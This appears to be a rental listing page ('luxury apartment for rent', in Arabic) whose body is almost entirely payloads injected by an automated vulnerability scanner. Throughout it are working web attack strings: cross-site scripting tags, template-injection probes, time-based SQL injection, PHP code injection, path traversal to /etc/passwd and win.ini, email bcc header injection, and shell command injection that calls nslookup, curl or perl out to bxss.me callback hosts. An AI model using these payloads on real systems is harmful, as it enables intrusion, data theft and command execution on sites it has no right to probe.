شقة فاخرة للايجار

}body{acu:Expre/**/SSion(UQrN(9408))}

<ScRiPt>UQrN(9142)</sCripT>

\u003CScRiPt\UQrN(9045)\u003C/sCripT\u003E

%0D%0A%3C%53%63%52%69%50%74%20%3E%55%51%72%4E%289450%29%3C%2F%73%43%72%69%70%54%3E

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx__${98991*97996}__::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "acx"}}xyz{{end}}{{template "acx"}}CCCBBBAAA

acx{{'abcd'.toUpperCase()}}xca

acx#{xca}=123

#{98991*97996*98991*97996}

acx{{{this}}}xca

acx{@math key=98991 method="multiply" operand=97996/}xca

98991*97996*98991*97996

print("acx" . 98991*97996 . "xca");

acx{{"abc"|title}}xca

acx#set($x=98991*97996)${x}xca

acx<%=98991*97996%>xca

acx@(98991*97996)xca

acx{{=98991*97996}}xca

acx{@98991*97996}xca

acx{#98991*97996}xca

acx#{98991*97996}xca

acx${98991*97996}xca

acx{98991*97996}xca

acx{{98991*97996}}xca

acx{{98991*97996}}xca

<%={{={@{#{${acx}}%>

acux2520��z1��z2a�bcxuca2520

acu6357＜s1﹥s2ʺs3ʹuca6357

9433901

@@6Y73G

1����%2527%2522

1'"

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

E7Bc6GA5')) OR 139=(SELECT 139 FROM PG_SLEEP(15))--

33G0feKZ') OR 770=(SELECT 770 FROM PG_SLEEP(15))--

vFgZzB1D' OR 505=(SELECT 505 FROM PG_SLEEP(15))--

-1)) OR 485=(SELECT 485 FROM PG_SLEEP(15))--

-5) OR 202=(SELECT 202 FROM PG_SLEEP(15))--

-5 OR 242=(SELECT 242 FROM PG_SLEEP(15))--

A7N1YHnw')); waitfor delay '0:0:15' --

vVoU0uvr'); waitfor delay '0:0:15' --

z1evPu51'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

}body{acu:Expre/**/SSion(dIyD(9747))}

-1; waitfor delay '0:0:15' --

&lt;ScRiPt&gt;dIyD(9390)&lt;/sCripT&gt;

\u003CScRiPt\dIyD(9054)\u003C/sCripT\u003E

%0D%0A%3C%53%63%52%69%50%74%20%3E%64%49%79%44%289606%29%3C%2F%73%43%72%69%70%54%3E

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx__${98991*97996}__::.x

acx[[${98991*97996}]]xca

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

acx{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<%={{={@{#{${acx}}%>

acux4484��z1��z2a�bcxuca4484

acu1479＜s1﹥s2ʺs3ʹuca1479

9206887

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1 OR 3*2>(0+5+413-413)

-1 OR 3*2<(0+5+413-413)

-1 OR 3+413-413-1=0+0+0+1

-1 OR 2+413-413-1=0+0+0+1

1*

1*

1*

1*

CmAT7fuP

}body{acu:Expre/**/SSion(gcRb(9263))}

&lt;ScRiPt&gt;gcRb(9537)&lt;/sCripT&gt;

\u003CScRiPt\gcRb(9067)\u003C/sCripT\u003E

%0D%0A%3C%53%63%52%69%50%74%20%3E%67%63%52%62%289309%29%3C%2F%73%43%72%69%70%54%3E

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx__${98991*97996}__::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<%={{={@{#{${acx}}%>

acux6578��z1��z2a�bcxuca6578

acu7311＜s1﹥s2ʺs3ʹuca7311

9063200

bxss.me

c:/windows/win.ini

/etc/shells

http://bxss.me/t/fit.txt?.jpg

'.print(md5(31337)).'

Http://bxss.me/t/fit.txt

${@print(md5(31337))}\

1some_inexistent_file_with_long_name.jpg

/\xfs.bxss.me

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

//xfs.bxss.me

http://xfs.bxss.me

${@print(md5(31337))}

980081

";print(md5(31337));$a="

';print(md5(31337));$a='

/xfs.bxss.me

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

;(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")|(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")&(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")

`(nslookup hitfzwpwlggwd3b8e7.bxss.me||perl -e "gethostbyname('hitfzwpwlggwd3b8e7.bxss.me')")`

|(nslookup hitdgujqdhnrt18e2a.bxss.me||perl -e "gethostbyname('hitdgujqdhnrt18e2a.bxss.me')")

ratecatalog/.

'"

&(nslookup hitqdxshsmnwqb07f5.bxss.me||perl -e "gethostbyname('hitqdxshsmnwqb07f5.bxss.me')")&'\"`0&(nslookup hitqdxshsmnwqb07f5.bxss.me||perl -e "gethostbyname('hitqdxshsmnwqb07f5.bxss.me')")&`'

ratecatalog

ratecatalog

$(nslookup hitjewgfjjimw7c36e.bxss.me||perl -e "gethostbyname('hitjewgfjjimw7c36e.bxss.me')")

(nslookup hitwolrwicnnr997d1.bxss.me||perl -e "gethostbyname('hitwolrwicnnr997d1.bxss.me')")

|echo rfpgbt$()\ malbvp\nz^xyu||a #' |echo rfpgbt$()\ malbvp\nz^xyu||a #|" |echo rfpgbt$()\ malbvp\nz^xyu||a #

'+'A'.concat(70-3).concat(22*4).concat(112).concat(78).concat(105).concat(84)+(require'socket' Socket.gethostbyname('hitvf'+'zptgdafnd4533.bxss.me.')[3].to_s)+'

&echo abnhtd$()\ nkvudj\nz^xyu||a #' &echo abnhtd$()\ nkvudj\nz^xyu||a #|" &echo abnhtd$()\ nkvudj\nz^xyu||a #

"+"A".concat(70-3).concat(22*4).concat(116).concat(79).concat(111).concat(67)+(require"socket" Socket.gethostbyname("hitnr"+"arwsiomh3cc9c.bxss.me.")[3].to_s)+"

echo afgqpb$()\ fmulga\nz^xyu||a #' &echo afgqpb$()\ fmulga\nz^xyu||a #|" &echo afgqpb$()\ fmulga\nz^xyu||a #

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

bxss.me/t/xss.html?%00

'"()

^(#$!@#$)(()))******

HttP://bxss.me/t/xss.html?%00

".gethostbyname(lc("hitqh"."pynahozd7f1e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(89).chr(102).chr(86)."

!(()&&!|*|*|

'.gethostbyname(lc('hitur'.'ehfrkhwq7788e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(110).chr(80).'

)

./

ctime sleep p0 (I30 tp1 Rp2 .

../

12345'"\'\");|]*{ <>�''💡

../../../../../../../../../../../../../../windows/win.ini

${9999646+9999067}

../../../../../../../../../../../../../../etc/passwd

&n974603=v934949

"+response.write(9441206*9332264)+"

'+response.write(9441206*9332264)+'

to@example.com> bcc:009247.289-19256.289.7bee1.19856.2@bxss.me

bcc:009247.289-19255.289.7bee1.19856.2@bxss.me

response.write(9441206*9332264)

XEVrDT56

/../../../../../../../../../../windows/system32/BITSADMIN.exe

1Cffe5bZHeO

@@66K6W

����%2527%2522\'\"

'"

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

McQ2g6ky')) OR 68=(SELECT 68 FROM PG_SLEEP(15))--

97F78ayO') OR 819=(SELECT 819 FROM PG_SLEEP(15))--

P1lZo6bu' OR 549=(SELECT 549 FROM PG_SLEEP(15))--

-1)) OR 337=(SELECT 337 FROM PG_SLEEP(15))--

-1) OR 46=(SELECT 46 FROM PG_SLEEP(15))--

-1 OR 463=(SELECT 463 FROM PG_SLEEP(15))--

h8BHqE0T')); waitfor delay '0:0:15' --

vli04nQy'); waitfor delay '0:0:15' --

HOndfVyH'; waitfor delay '0:0:15' --

-1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z

*if(now()=sysdate(),sleep(15),0)

}body{zzz:Expre/**/SSion(ZEjT(9359))}

&lt;ScRiPt&gt;ZEjT(9516)&lt;/sCripT&gt;

\u003CScRiPt\ZEjT(9819)\u003C/sCripT\u003E

%0D%0A%3C%53%63%52%69%50%74%20%3E%5A%45%6A%54%289768%29%3C%2F%73%43%72%69%70%54%3E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

bfgx5614��z1��z2a�bcxhjl5614

bfg9909＜s1﹥s2ʺs3ʹhjl9909

9958093

/\xfs.bxss.me?labeb.com

//xfs.bxss.me?labeb.com

xfs.bxss.me?labeb.com

http://xfs.bxss.me?labeb.com

914958

xfs.bxss.me

'"

ratecatalog/.

ratecatalog

ratecatalog

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'+'A'.concat(70-3).concat(22*4).concat(103).concat(76).concat(113).concat(76)+(require'socket' Socket.gethostbyname('hitac'+'mhlnukne51650.bxss.me.')[3].to_s)+'

bxss.me

"+"A".concat(70-3).concat(22*4).concat(110).concat(81).concat(99).concat(80)+(require"socket" Socket.gethostbyname("hitjh"+"uuxrtlykb9776.bxss.me.")[3].to_s)+"

c:/windows/win.ini

/etc/shells

http://bxss.me/t/fit.txt?.jpg

bxss.me/t/xss.html?%00

Http://bxss.me/t/fit.txt

HttP://bxss.me/t/xss.html?%00

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

ctime sleep p0 (I30 tp1 Rp2 .

"+response.write(9832519*9291548)+"

'+response.write(9832519*9291548)+'

response.write(9832519*9291548)

;(nslookup -q=cname hitqfelyqeggv8b5f5.bxss.me||curl hitqfelyqeggv8b5f5.bxss.me)|(nslookup -q=cname hitqfelyqeggv8b5f5.bxss.me||curl hitqfelyqeggv8b5f5.bxss.me)&(nslookup -q=cname hitqfelyqeggv8b5f5.bxss.me||curl hitqfelyqeggv8b5f5.bxss.me)

${9999400+9999719}

`(nslookup -q=cname hitfwdtcpadme29199.bxss.me||curl hitfwdtcpadme29199.bxss.me)`

|(nslookup -q=cname hitqpemsbothue1c95.bxss.me||curl hitqpemsbothue1c95.bxss.me)

&(nslookup -q=cname hittghvxoaliie8d7d.bxss.me||curl hittghvxoaliie8d7d.bxss.me)&'\"`0&(nslookup -q=cname hittghvxoaliie8d7d.bxss.me||curl hittghvxoaliie8d7d.bxss.me)&`'

&nslookup -q=cname hitkkfxngzltw3bc63.bxss.me&'\"`0&nslookup -q=cname hitkkfxngzltw3bc63.bxss.me&`'

$(nslookup -q=cname hitrihdmzsnkuf18cf.bxss.me||curl hitrihdmzsnkuf18cf.bxss.me)

(nslookup -q=cname hitqozrnacnpf16b01.bxss.me||curl hitqozrnacnpf16b01.bxss.me))

|echo yyktlf$()\ jqkvhk\nz^xyu||a #' |echo yyktlf$()\ jqkvhk\nz^xyu||a #|" |echo yyktlf$()\ jqkvhk\nz^xyu||a #

&echo biyxfg$()\ sizkef\nz^xyu||a #' &echo biyxfg$()\ sizkef\nz^xyu||a #|" &echo biyxfg$()\ sizkef\nz^xyu||a #

12345'"\'\");|]*{ <>�''💡

echo nlsolt$()\ ykyzay\nz^xyu||a #' &echo nlsolt$()\ ykyzay\nz^xyu||a #|" &echo nlsolt$()\ ykyzay\nz^xyu||a #

./

../

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

/../../../../../../../../../../windows/system32/BITSADMIN.exe

zjcYSuYe

&n935166=v914314

'.print(md5(31337)).'

"||sleep(27*1000)*vgauch||"

${@print(md5(31337))}\

'||sleep(27*1000)*cragqv||'

"&&sleep(27*1000)*ooaczw&&"

${@print(md5(31337))}

'&&sleep(27*1000)*tmidsw&&'

";print(md5(31337));$a="

'"()

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

".gethostbyname(lc("hitdt"."hckaimky41a9b.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(75).chr(103).chr(72)."

'.gethostbyname(lc('hitkl'.'lllyongge70a9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(99).chr(66).'

^(#$!@#$)(()))******

!(()&&!|*|*|

)